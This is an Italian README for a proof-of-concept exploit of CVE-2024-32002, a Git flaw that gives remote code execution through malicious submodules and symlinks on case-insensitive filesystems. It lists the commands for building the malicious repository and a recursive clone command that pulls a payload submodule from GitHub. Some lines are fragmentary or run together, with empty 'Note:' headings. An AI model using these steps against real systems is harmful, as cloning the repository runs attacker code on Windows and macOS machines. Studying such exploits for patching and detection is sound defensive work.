
Proof-of-concept exploit per CVE-2024-32002, che dimostra l'esecuzione remota di codice tramite sottomoduli Git malevoli su filesystem case-insensitive.
Un POC per CVE-2024-32002 che dimostra l'esecuzione remota di codice (RCE).
Vedi cve-2024-32002-poc-rce per il repository del sottomodulo correlato.
.git..gitmodules che definisce il sottomodulo malevolo.Questo repo è stato creato su Linux (WSL2, per essere precisi). Questo è importante: il repo malevolo può essere creato solo su un filesystem sensibile alle maiuscole/minuscole.
ln -s .git submodule
Note:
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
Note:
.git che traccia lo stato git dei sottomoduli.Questa vulnerabilità colpisce solo Windows e MacOS perché entrambi hanno filesystem insensibili alle maiuscole/minuscole.
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git